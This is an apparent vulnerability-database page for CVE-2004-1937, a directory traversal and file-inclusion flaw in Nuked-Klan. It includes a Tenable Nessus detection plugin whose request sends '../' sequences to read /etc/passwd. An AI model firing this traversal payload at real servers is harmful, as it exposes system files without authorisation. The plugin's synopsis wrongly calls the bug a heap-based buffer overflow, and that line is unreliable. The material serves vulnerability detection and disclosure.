Vulnerabilities > CVE-2004-1937 - Multiple vulnerability in Nuked-Klan

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
NONE
Availability impact
NONE
network
low complexity
nuked-klan
nessus
exploit available
NVD
Published: 2004-12-31
Updated: 2017-07-11

Summary

Multiple directory traversal vulnerabilities in Nuked-KlaN 1.4b and 1.5b allow remote attackers to read or include arbitrary files via .. sequences in (1) the user_langue parameter to index.php or (2) the langue parameter to update.php, or modify arbitrary GLOBAL variables by causing globals.php to be loaded before conf.inc.php via (3) .. sequences in the file parameter with the page parameter set to globals, or (4) ../globals.php in the user_langue parameter, as demonstrated by modifying $nuked[prefix] in the Suggest module.

Vulnerable Configurations

Part Description Count
Application
Nuked-Klan
7

Exploit-Db

descriptionNuked-Klan 1.x Multiple Vulnerabilities. CVE-2004-1937. Webapps exploit for php platform
idEDB-ID:23988
last seen2016-02-02
modified2004-04-12
published2004-04-12
reporterfrog
sourcehttps://www.exploit-db.com/download/23988/
titleNuked-Klan 1.x - Multiple Vulnerabilities

Nessus

NASL familyCGI abuses
NASL idNUKED_KLAN_FILE_INCLUDE.NASL
descriptionNuked-klan is installed on the remote host. There is a bug in this version that could allow an attacker to include php files hosted on a third-party website, thus allowing an attacker to execute arbitrary commands on this host. Another bug allows an attacker to read arbitrary files on the remote host.
last seen2020-06-01
modified2020-06-02
plugin id12202
published2004-04-13
reporterThis script is Copyright (C) 2004-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/12202
titleNuked-Klan index.php user_langue Parameter Traversal Arbitrary File Access
code
#
# (C) Tenable Network Security, Inc.
#

include( 'compat.inc' );

if (description)
{
  script_id(12202);
  script_version ("1.18");
  script_cve_id("CVE-2004-1937");
  script_bugtraq_id(10104);

  script_name(english:"Nuked-Klan index.php user_langue Parameter Traversal Arbitrary File Access");
  script_summary(english:"Determine if Nuked-klan is vulnerable to a file include attack");

  script_set_attribute(
    attribute:'synopsis',
    value:'The remote service is prone to a heap-based buffer overflow.'
  );

  script_set_attribute(
    attribute:'description',
    value:"Nuked-klan is installed on the remote host.

There is a bug in this version that could allow an attacker to include
php files hosted on a third-party website, thus allowing an attacker to
execute arbitrary commands on this host.

Another bug allows an attacker to read arbitrary files on the remote host."
  );

  script_set_attribute(
    attribute:'solution',
    value: "Upgrade Nuked-klan to a version newer than 1.5b."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:W/RC:ND");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(
    attribute:'see_also',
    value:'https://www.phpsecure.info/v2/tutos/frog/Nuked-KlaN.txt'
  );


  script_set_attribute(
    attribute:'see_also',
    value:'https://marc.info/?l=bugtraq&m=108222826225823&w=2'
  );

 script_set_attribute(attribute:"plugin_publication_date", value: "2004/04/13");
 script_cvs_date("Date: 2018/11/15 20:50:18");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"CGI abuses");
  script_copyright(english:"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.");
  script_dependencie("find_service1.nasl", "http_version.nasl");
  script_require_ports("Services/www", 80);
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_keys("www/PHP");
  exit(0);
}

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:80);
if(!can_host_php(port:port))exit(0);

foreach d (cgi_dirs())
{
 url = string(d, "/index.php?user_langue=../../../../../../../../../../etc/passwd");
 w = http_send_recv3(method:"GET", item:url, port:port);
 if (isnull(w)) exit(1, "The web server on port "+port+" did not answer");
 buf = strcat(w[0], w[1], '\r\n', w[2]);

 if ( egrep(pattern:"root:.*:0:[01]:", string:buf) )
   {
    security_hole(port:port);
    exit(0);
   }
}

References